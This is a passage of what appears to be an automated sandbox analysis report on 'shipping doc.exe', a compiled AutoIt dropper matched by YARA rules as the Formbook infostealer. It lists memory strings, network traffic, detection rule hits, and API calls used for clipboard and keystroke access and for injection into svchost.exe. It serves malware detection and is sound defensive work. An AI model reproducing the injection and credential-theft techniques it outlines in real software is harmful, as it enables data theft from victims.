          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000003.3108559713.000000000CB2A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282322024.000000000CB2A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106153587.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
          Source: explorer.exe, 00000002.00000000.1821307110.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000000.1821307110.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: chrome.exe, 00000011.00000000.2352347416.00005D400032C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
          Source: chrome.exe, 00000011.00000000.2352347416.00005D400033F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Compositor
          Source: chrome.exe, 0000000E.00000000.2166306881.00002824008B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2228860212.00005B80008B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2293008453.00007B64008BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.2353676241.00005D40008AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Google
          Source: chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
          Source: chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
          Source: chrome.exe, 0000000E.00000000.2166556085.0000282400928000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/https://accounts.google.com/=OTJgUOQcT7lO7GsGZq2G4IlTharP
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
          Source: chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfohttps://www.googleapis.com/oauth2/v4/tokenhttps://acco
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
          Source: chrome.exe, 00000010.00000000.2292417995.00007B6400754000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.jsdelivr.com/using-sri-with-dynamic-files
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49757 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.46.162.224:443 -> 192.168.2.4:49769 version: TLS 1.2
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0015EAFF
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0015ED6A
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0015EAFF
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0014AA57
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00179576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00179576

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: shipping doc.exe PID: 2932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 3804, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: shipping doc.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: shipping doc.exe, 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2aafd8f6-b
          Source: shipping doc.exe, 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2a8f42d7-9
          Source: shipping doc.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3681e1be-7
          Source: shipping doc.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_959bb9e3-b
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A350 NtCreateFile,1_2_0041A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A400 NtReadFile,1_2_0041A400
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A480 NtClose,1_2_0041A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A530 NtAllocateVirtualMemory,1_2_0041A530
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A34A NtCreateFile,1_2_0041A34A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A3FC NtReadFile,1_2_0041A3FC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A52A NtAllocateVirtualMemory,1_2_0041A52A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03A72BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72B60 NtClose,LdrInitializeThunk,1_2_03A72B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AD0 NtReadFile,LdrInitializeThunk,1_2_03A72AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FB0 NtResumeThread,LdrInitializeThunk,1_2_03A72FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03A72F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FE0 NtCreateFile,LdrInitializeThunk,1_2_03A72FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F30 NtCreateSection,LdrInitializeThunk,1_2_03A72F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03A72EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_03A72E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03A72DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DD0 NtDelayExecution,LdrInitializeThunk,1_2_03A72DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_03A72D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D10 NtMapViewOfSection,LdrInitializeThunk,1_2_03A72D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_03A72CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03A72C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A74340 NtSetContextThread,1_2_03A74340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A74650 NtSuspendThread,1_2_03A74650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BA0 NtEnumerateValueKey,1_2_03A72BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72B80 NtQueryInformationFile,1_2_03A72B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BE0 NtQueryValueKey,1_2_03A72BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AB0 NtWaitForSingleObject,1_2_03A72AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AF0 NtWriteFile,1_2_03A72AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FA0 NtQuerySection,1_2_03A72FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F60 NtCreateProcessEx,1_2_03A72F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72EE0 NtQueueApcThread,1_2_03A72EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72E30 NtWriteVirtualMemory,1_2_03A72E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DB0 NtEnumerateKey,1_2_03A72DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D00 NtSetInformationFile,1_2_03A72D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CF0 NtOpenProcess,1_2_03A72CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CC0 NtQueryVirtualMemory,1_2_03A72CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C00 NtQueryInformationProcess,1_2_03A72C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C60 NtCreateKey,1_2_03A72C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73090 NtSetValueKey,1_2_03A73090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73010 NtOpenDirectoryObject,1_2_03A73010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A735C0 NtCreateMutant,1_2_03A735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A739B0 NtGetContextThread,1_2_03A739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73D10 NtOpenProcessToken,1_2_03A73D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73D70 NtOpenThread,1_2_03A73D70
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0014D5EB
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00141201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00141201
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0014E8F6
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001520460_2_00152046
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000E80600_2_000E8060
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001482980_2_00148298
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0011E4FF0_2_0011E4FF
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0011676B0_2_0011676B
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001748730_2_00174873
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0010CAA00_2_0010CAA0
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000ECAF00_2_000ECAF0
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000FCC390_2_000FCC39
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00116DD90_2_00116DD9
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000FB1190_2_000FB119
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000E91C00_2_000E91C0
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001013940_2_00101394
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001017060_2_00101706
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0010781B0_2_0010781B
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000E79200_2_000E7920
